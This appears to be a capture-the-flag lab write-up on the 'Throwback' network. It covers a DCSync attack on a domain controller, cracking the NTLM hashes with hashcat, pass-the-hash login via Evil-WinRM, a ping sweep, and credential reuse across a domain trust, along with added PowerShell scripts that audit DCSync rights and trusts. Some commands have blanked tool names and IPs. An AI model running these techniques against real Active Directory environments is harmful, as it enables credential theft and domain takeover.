Throwback — Part 7 — THROWBACK-DC01, CORP-DC01, CORP-ADT01

Now that we have access to the Domain Controller, it is time to extend our privileges. The technique used for this is a DCSync attack.


DCSync abuses the directory replication protocol. The attacker first discovers a Domain Controller. Then the attacker pretends to be another Domain Controller and asks the target to replicate user objects (a GetNCChanges request over the DRSUAPI RPC interface). Finally the targeted Domain Controller sends back the requested user data, including the password hashes.

In order to perform this attack, the attacker needs the Replicating Directory Changes and Replicating Directory Changes All rights on the domain object. By default, Domain Admins, Enterprise Admins and the Domain Controllers themselves have these rights. BloodHound also ships a pre-built query ("Find Principals with DCSync Rights") that shows every account holding them.

In this case the Backup user has the rights to perform a DCSync attack, even though it is not an Administrator. This is possible because the required rights can be granted to any account individually. The credentials for the Backup account can be found in the Documents folder of JeffersD:
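The check a defender (or an attacker without BloodHound) would run to find accounts like Backup, as an added example that is not part of the original write-up: it reads the DACL of the domain object and reports every principal holding the replication rights, or a blanket right (GenericAll, all extended rights) that implies them. It assumes it runs as any domain user on a domain-joined Windows host and uses ADSI/.NET only, so the ActiveDirectory module is not required.

```powershell
# Added example, not from the original write-up. Lists principals with DCSync-capable
# rights on the domain naming context. Assumes a domain-joined host and a domain user.

# Control-access-right GUIDs used by DCSync (well-known, documented by Microsoft).
$DcSyncRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

# Bind to the domain object; its DACL is what a DC checks on a replication request.
$rootDse = [ADSI]'LDAP://RootDSE'
$domain  = [ADSI]"LDAP://$($rootDse.defaultNamingContext)"
$aces    = $domain.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.NTAccount])

# Keep only Allow ACEs that grant a replication right, every extended right, or GenericAll.
$grants = foreach ($ace in $aces) {
    if ($ace.AccessControlType -ne 'Allow') { continue }
    $rights = $ace.ActiveDirectoryRights.ToString()
    $guid   = $ace.ObjectType.ToString()

    if ($rights -match 'GenericAll') {
        $name = 'GenericAll (implies DCSync)'
    } elseif ($rights -match 'ExtendedRight' -and $ace.ObjectType -eq [Guid]::Empty) {
        $name = 'All extended rights (implies DCSync)'
    } elseif ($rights -match 'ExtendedRight' -and $DcSyncRights.ContainsKey($guid)) {
        $name = $DcSyncRights[$guid]
    } else {
        continue
    }
    [PSCustomObject]@{ Principal = $ace.IdentityReference.Value; Right = $name }
}

# A principal can DCSync with Get-Changes plus Get-Changes-All, or with any blanket right.
$grants | Group-Object Principal | ForEach-Object {
    $held    = @($_.Group.Right | Sort-Object -Unique)
    $canSync = [bool]($held -match 'implies DCSync') -or
               ($held -contains 'DS-Replication-Get-Changes' -and
                $held -contains 'DS-Replication-Get-Changes-All')
    [PSCustomObject]@{
        Principal = $_.Name
        Rights    = $held -join ', '
        CanDCSync = $canSync
    }
} | Sort-Object CanDCSync, Principal -Descending | Format-Table -AutoSize
```

Expect the built-in administrative groups and the Domain Controllers to be listed. Any other principal with CanDCSync set to True, such as the Backup account here, is a direct path to every password hash in the domain and should be reviewed. The script only inspects the domain root; rights inherited from elsewhere do not apply to replication, which is why inherited ACEs are shown but not treated specially.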

Now we can perform the DCSync attack using “” from impacket. With the following command it is possible to retrieve the password hashes:

proxychains python3 /usr/share/doc/python3-impacket/examples/ -dc-ip THROWBACK/backup@

Cracking the hashes

hashcat.exe -m 1000 -a 0 hash.txt rockyou.txt -r rules\OneRuleToRuleThemAll.rule

The mode for the hashes is 1000, because these are NTLM (NT) hashes, the fourth colon-separated field of each line in the dump. I was able to crack the password for MercerH. After analyzing the account in BloodHound, we can see that this is a Domain Admin and has a flag in his description property:


Next I connected to the Domain Controller with Evil-WinRM as MercerH:

proxychains evil-winrm -u MercerH -H MERCERH_HASH -i

Then I could retrieve the root flag:

Next I started a ping sweep to discover which hosts we can reach. I was able to discover a new host:

1..255 | % {"10.200.70.$($_): $(Test-Connection -count 1 -comp 10.200.70.$($_) -quiet)"}

After resolving the hostname of the machine, it looked like it belonged to the other domain, “CORPORATE.local”:


Crossing the trust

proxychains xfreerdp /v: /u:THROWBACK\\MercerH  /p:MERCERH_PASSWORD +clipboard

Once I was on that host, I connected via RDP to the Corporate DC using the MercerH user:
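Reusing THROWBACK credentials in CORPORATE.local only works because of a trust between the two domains. The following is an added example, not part of the original write-up, that enumerates the trusts of the current domain and says whether accounts from here should be accepted by a given target domain. It assumes it runs as a domain user on a host joined to THROWBACK, uses .NET only (no ActiveDirectory module), and the target name 'CORPORATE.local' is taken from the write-up.

```powershell
# Added example, not from the original write-up. Enumerates domain trusts and checks
# whether our accounts are accepted by a target domain. Assumes a domain-joined host.

$current = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$trusts  = $current.GetAllTrustRelationships()

# Overview of every trust the current domain has.
$trusts | ForEach-Object {
    [PSCustomObject]@{
        Source    = $_.SourceName
        Target    = $_.TargetName
        TrustType = $_.TrustType       # e.g. External, Forest, ParentChild
        Direction = $_.TrustDirection  # Inbound, Outbound or Bidirectional, as seen from Source
    }
} | Format-Table -AutoSize

# Direction follows the trustDirection attribute semantics (MS-ADTS): from the source
# domain's side, Inbound means the target domain trusts us, so our accounts can log on
# there; Outbound means we trust the target, so only its accounts can log on here.
$target = 'CORPORATE.local'
$trust  = $trusts | Where-Object { $_.TargetName -ieq $target } | Select-Object -First 1

if (-not $trust) {
    "No direct trust between $($current.Name) and $target; check the forest trusts too:"
    [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().GetAllTrustRelationships() |
        Format-Table SourceName, TargetName, TrustType, TrustDirection -AutoSize
} elseif ($trust.TrustDirection.ToString() -in @('Inbound', 'Bidirectional')) {
    "$target trusts $($current.Name): accounts such as MercerH should be accepted there."
} else {
    "$($current.Name) only trusts $target: accounts from here are not accepted by $target."
}
```

If the trust is one-way in the wrong direction, the credentials still work on the THROWBACK side but will be rejected by the Corporate hosts, which saves a round of failed RDP attempts that would show up in the target's security log.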

Then I could get the user and root flag on the Corporate DC:

During enumeration I found an interesting file called “server_update” inside the Administrator's Documents directory:


During enumeration of the host I spotted an interesting file called “email_update.txt” inside DosierK's Documents folder:

Hey team! Hope you guys are having a good day!

As all of you probably already know, we are transferring to our new email service. As we
transition, please use the new emails provided to you as well as the default credentials
that can be found within your emails.

Please do not use these emails outside of corporate as they contain sensitive information.

The new email format is based on what department you are in:

In order to access your email you will need to go to mail.corporate.local as we get our
servers moved over.

If you do not already have mail.corporate.local set in your hosts file please reach out to
IT to get that fixed.

Please remain patient as we make this transition and please feel free to email me with any
questions you may have regarding the new transition:

Karen Dosier,
Human Relations Consultant


MercerH should use a more complex password.
